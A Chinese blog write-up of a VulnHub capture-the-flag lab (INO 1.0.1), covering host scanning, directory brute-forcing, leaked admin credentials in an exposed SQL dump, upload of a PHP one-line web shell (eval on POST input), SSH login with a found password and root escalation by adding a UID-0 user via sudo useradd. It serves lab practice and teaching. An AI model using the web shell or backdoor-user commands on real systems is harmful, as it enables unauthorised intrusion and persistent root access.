INO
- 写写打靶记录。
- 靶机地址:https://www.vulnhub.com/entry/ino-101,601/
- 本靶场主要任务:找到 1 个 flag。
主机探测
IP 探测
1 | C:\Users\Yongz\nmap# nmap -sP 192.168.146.0/24 |
- 判断出 192.168.146.152 为靶机 IP 地址。
服务探测
1 | C:\Users\Yongz\nmap# nmap -sS -sV 192.168.146.152 |
- 发现一个 SSH 服务与 HTTP 服务,个人习惯先对 HTTP 服务进行测试。
Web 渗透
信息收集
- 访问对方 HTTP 服务
- 看了下 HTML 源码,没啥有价值的信息;
目录扫描
- 我这使用 dirsearch 来进行,并将代理连接到 BurpSuite。
1 | python3 dirsearch.py -e php --random-agent -i 200 --full-url --proxy=127.0.0.1:8080 -t 15 -u "http://192.168.146.152/lot/" |
- 在 BurpSuite 上查看一下
- 找到 database 文件夹,查看发现存在目录遍历漏洞。
- 点击 lot_db.sql 文件,会显示下载。
1 | ..... |
- 发现账号密码(MD5解密为:admin123):admin/admin123。
- 同时,发现有一个 admin 文件夹,访问要求输入账号密码。
- 这里其实可以忽略上一步的SQL文件,直接爆破,马后炮来看账号密码非常简单。使用前面的账号密码成功登陆。
文件上传
- 用上述账号密码来尝试 SSH 登录。
1 | C:\Users\Yongz\nmap# ssh admin@192.168.146.152 |
- 登不上,但发现有文件上传点。
- 尝试文件上传,上传一句话木马。
1 | eval($_POST['v']) |
- 发现直接上传 php 文件并没有被拦截,但也没有文件上传位置回显。
- 现在就是查找文件上传文件,在 BurpSuite 中发现个 assets 路径,访问发现存在目录遍历漏洞。
- 发现了 uploads,依次点击,发现上传的 PHP 文件。
- 使用蚁剑连接试试。
- 成功连接,看下 passwd 文件,发现一个 ppp 用户。
SSH 登录
- 查找 ppp 有关的文件:
1 | find / -name *ppp* 2>/dev/null |
- 访问一下
- 这里文件不多,可以一个一个点开看,我这选择用 grep 找:
1 | grep -ri 'ppp' ./ 2>/dev/null |
- 找到类似密码的字符串:ESRxd7856HVJB,使用 SSH 登录试试
- 登录成功!
useradd 提权
- 当想查找 flag 文件时,处处提示没权限。
- 接下来就是提权工作。
- 使用 sudo -l 查找当前用户可以执行的 sudo 命令
1 | useradd -p `openssl passwd 123456` -o -u 0 -g root -G root -s /bin/bash yz |
- 找到 flag
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Yongz丶!